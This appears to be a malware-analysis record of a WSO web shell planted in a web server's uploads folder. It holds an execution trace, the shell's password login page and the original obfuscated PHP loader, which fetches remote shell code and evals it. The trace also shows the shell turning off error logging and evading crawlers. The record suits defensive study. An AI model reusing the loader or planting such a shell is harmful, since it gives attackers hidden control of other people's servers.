2 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 10 $▚ = 'FilesMan'
3 7 0 0.062889 1046456 md5 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 11 1 'python-requests/2.25.1'
3 7 1 0.062904 1046552
3 7 R 'ecd862b3d0595af0a0b03f511e800938'
2 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 11 $▙ = 'ecd862b3d0595af0a0b03f511e800938'
3 8 0 0.062932 1046520 md5 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 12 1 'localhost'
3 8 1 0.062946 1046616
3 8 R '421aa90e079fa326b6494f812ad13e79'
3 9 0 0.062963 1046520 md5 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 13 1 'localhost'
3 9 1 0.062977 1046616
3 9 R '421aa90e079fa326b6494f812ad13e79'
3 10 0 0.062991 1046584 prototype 1 /var/www/html/uploads/wsoby.php(1) : eval()'d code 13 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938'
3 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 360 _COOKIE['421aa90e079fa326b6494f812ad13e79key'] = 'ecd862b3d0595af0a0b03f511e800938'
4 11 0 0.063024 1046960 setcookie 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 361 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938'
4 11 1 0.063045 1047160
4 11 R TRUE
3 10 1 0.063058 1047096
2 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 16 _POST['charset'] = 'UTF-8'
3 12 0 0.063082 1047472 ini_set 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 25 2 'error_log' NULL
3 12 1 0.063098 1047544
3 12 R ''
3 13 0 0.063112 1047472 ini_set 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 26 2 'log_errors' 0
3 13 1 0.063127 1047544
3 13 R '1'
3 14 0 0.063140 1047472 ini_set 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 27 2 'max_execution_time' 0
3 14 1 0.063156 1047576
3 14 R '30'
3 15 0 0.063169 1047472 set_time_limit 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 28 1 0
3 15 1 0.063184 1047536
3 15 R FALSE
3 16 0 0.063197 1047504 version_compare 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 29 3 '7.2.34-37+ubuntu22.04.1+deb.sury.org+1' '5.3.0' '<'
3 16 1 0.063215 1047600
3 16 R FALSE
3 17 0 0.063227 1047504 define 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 32 2 'VERSION' '4.2.6'
3 17 1 0.063243 1047608
3 17 R TRUE
3 18 0 0.063255 1047536 get_magic_quotes_gpc 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 33 0
3 18 1 0.063268 1047536
3 18 R FALSE
3 19 0 0.063282 1047536 md5 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 44 1 'localhost'
3 19 1 0.063299 1047632
3 19 R '421aa90e079fa326b6494f812ad13e79'
3 20 0 0.063315 1047536 hardLogin 1 /var/www/html/uploads/wsoby.php(1) : eval()'d code 45 0
3 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 51 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
4 21 0 0.063347 1047536 implode 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 52 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
4 21 1 0.063368 1047680
4 21 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
4 22 0 0.063384 1047616 preg_match 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 52 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
4 22 1 0.063403 1047680
4 22 R 0
0.063446 968136
TRACE END [2023-02-13 00:33:21.155171]
Generated HTML code
<html><head></head><body><br><br><pre align="center"><form method="post" style="font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;"><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder="password" type="password" name="pass" style="border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;" required=""><input type="submit" name="watching" value=">>" style="height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;"></form></pre>
<div class="view"><div class="plane main"><div class="circle"></div><div class="circle"></div><div class="circle"></div><div class="circle"></div><div class="circle"></div><div class="circle"></div></div></div>
<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:'';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style></body></html>Original PHP code
<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/0xNix/wso/main/wso.php"));/**/?>